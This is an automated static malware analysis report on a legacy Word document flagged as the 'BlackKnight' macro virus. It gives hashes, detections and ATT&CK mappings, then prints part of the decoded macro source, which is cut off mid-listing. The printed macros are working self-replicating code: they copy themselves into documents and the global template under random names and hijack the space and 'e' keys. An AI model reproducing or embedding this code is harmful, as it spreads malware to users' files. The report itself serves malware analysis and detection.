Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3d85d132eec2c98d…

MALICIOUS

Office (OLE)

41.0 KB Created: 2001-12-08 05:17:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 2d964742eed412cf3ee6299145ae4762 SHA-1: bf0b1d26a5d3773c6ed65c5c57cd0e66ec6f8dcd SHA-256: 3d85d132eec2c98d99128c1ef4b89bed6fec7a1d46460faea9e07a7f201ea9da
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macros, flagged by heuristics, and the document body explicitly mentions 'polymorphic BlackKnight Virus'. The macros attempt to save the document in a different format and copy themselves using `MacroCopy`, suggesting an attempt to establish persistence or spread. The ClamAV detection further confirms its malicious nature.

Heuristics 3

  • ClamAV: Legacy.Trojan.Agent-645 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Legacy.Trojan.Agent-645
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6687 bytes
SHA-256: a24dcd96678c198655625d6100e9aa54e991cdea687f0f88c23db708ceb64ca7
Detection
ClamAV: Legacy.Trojan.Agent-645
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "DOFYBPIT"

Public Sub MAIN()
Dim A$
Dim CO$
Dim OC$
On Error GoTo -1: On Error GoTo Finish

A$ = WordBasic.[FileName$]()
If A$ = "" Then GoTo Finish

CO$ = WordBasic.[GetProfileString$]("Intl", "Info1")
OC$ = WordBasic.[GetProfileString$]("Intl", "Info2")

If VInstalled = 1 Then
    GoTo Finish
Else
    On Error Resume Next
    WordBasic.FileSaveAs Format:=1
    Run1
    Run2
    WordBasic.FileSaveAll 1, 0
End If

Finish:
A$ = WordBasic.[FileName$]()
If A$ = "" Then
    GoTo Finito
Else
    WordBasic.Insert " "
End If

Finito:
End Sub

Private Sub Run1()
Dim X$
Dim F$
Dim G$
Dim H$
Dim J$
Dim Y$
Dim Z$
Dim CO$
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

CO$ = WordBasic.[GetProfileString$]("Intl", "Info2")
WordBasic.MacroCopy "Global:" + CO$, WordBasic.[FileName$]() + ":" + Z$, 1
WordBasic.SetDocumentVar "VirName", Z$
WordBasic.ToolsCustomizeKeyboard KeyCode:=32, Category:=2, Name:=Z$, Add:=1, Context:=1
End Sub

Private Sub Run2()
Dim X$
Dim F$
Dim G$
Dim H$
Dim J$
Dim Y$
Dim Z$
Dim OC$
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

OC$ = WordBasic.[GetProfileString$]("Intl", "Info1")
WordBasic.MacroCopy "Global:" + OC$, WordBasic.[FileName$]() + ":" + Z$, 1
WordBasic.SetDocumentVar "VirNameDoc", Z$
WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:=Z$, Add:=1, Context:=1
End Sub

Private Function VInstalled()
Dim CC$
Dim i
On Error Resume Next
CC$ = WordBasic.[GetDocumentVar$]("VirNameDoc")
    VInstalled = 0
    If WordBasic.CountMacros(1) > 0 Then
        For i = 1 To WordBasic.CountMacros(1)
            If WordBasic.[MacroName$](i, 1) = CC$ Then
                VInstalled = 1
            End If
        Next i
    End If
End Function

Private Function Fun$(F$, G$, H$, J$)
Dim One
Dim Two
Dim Num
Dim A$
Dim B$
Dim C$
Dim D$
Dim E$
One = 1169
Two = 9294
Num = WordBasic.Int(Rnd() * (Two - One) + One)
A$ = Str(Num)
A$ = WordBasic.[LTrim$](A$)

B$ = Mid(A$, 1, 1)
C$ = Mid(A$, 2, 1)
D$ = Mid(A$, 3, 1)
E$ = Mid(A$, 4, 1)

If B$ = "1" Then F$ = "A"
If B$ = "2" Then F$ = "B"
If B$ = "3" Then F$ = "C"
If B$ = "4" Then F$ = "D"
If B$ = "5" Then F$ = "E"
If B$ = "6" Then F$ = "F"
If B$ = "7" Then F$ = "G"
If B$ = "8" Then F$ = "H"
If B$ = "9" Then F$ = "I"
If B$ = "0" Then F$ = "J"

If C$ = "1" Then G$ = "H"
If C$ = "2" Then G$ = "I"
If C$ = "3" Then G$ = "J"
If C$ = "4" Then G$ = "K"
If C$ = "5" Then G$ = "L"
If C$ = "6" Then G$ = "M"
If C$ = "7" Then G$ = "N"
If C$ = "8" Then G$ = "O"
If C$ = "9" Then G$ = "P"
If C$ = "0" Then G$ = "Q"

If D$ = "1" Then H$ = "A"
If D$ = "2" Then H$ = "B"
If D$ = "3" Then H$ = "C"
If D$ = "4" Then H$ = "D"
If D$ = "5" Then H$ = "E"
If D$ = "6" Then H$ = "F"
If D$ = "7" Then H$ = "G"
If D$ = "8" Then H$ = "H"
If D$ = "9" Then H$ = "I"
If D$ = "0" Then H$ = "J"

If E$ = "1" Then J$ = "R"
If E$ = "2" Then J$ = "S"
If E$ = "3" Then J$ = "T"
If E$ = "4" Then J$ = "U"
If E$ = "5" Then J$ = "V"
If E$ = "6" Then J$ = "W"
If E$ = "7" Then J$ = "X"
If E$ = "8" Then J$ = "Y"
If E$ = "9" Then J$ = "Z"
If E$ = "0" Then J$ = "Q"

Fun$ = F$ + G$ + H$ + J$
End Function

Attribute VB_Name = "DIJRCJCY"

Public Sub MAIN()
Dim A$
On Error GoTo -1: On Error GoTo Done

A$ = WordBasic.[FileName$]()
If A$ = "" Then GoTo Finish

If VInstalled = 0 Then
    Run1
    Run2
    WordBasic.FileSaveAll 1, 1
Else
    GoTo Done
End If

Done:
A$ = WordBasic.[FileName$]()
If A$ = "" Then
    GoTo Finish
Else
    WordBasic.Insert "e"
End If

Finish:
WordBasic.MsgBox "BlackKnight", -8
End Sub

Private Sub Run1()
Dim X$
Dim F$
Dim G$
Dim H$
Dim J$
Dim Y$
Dim Z$
Dim R1$
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.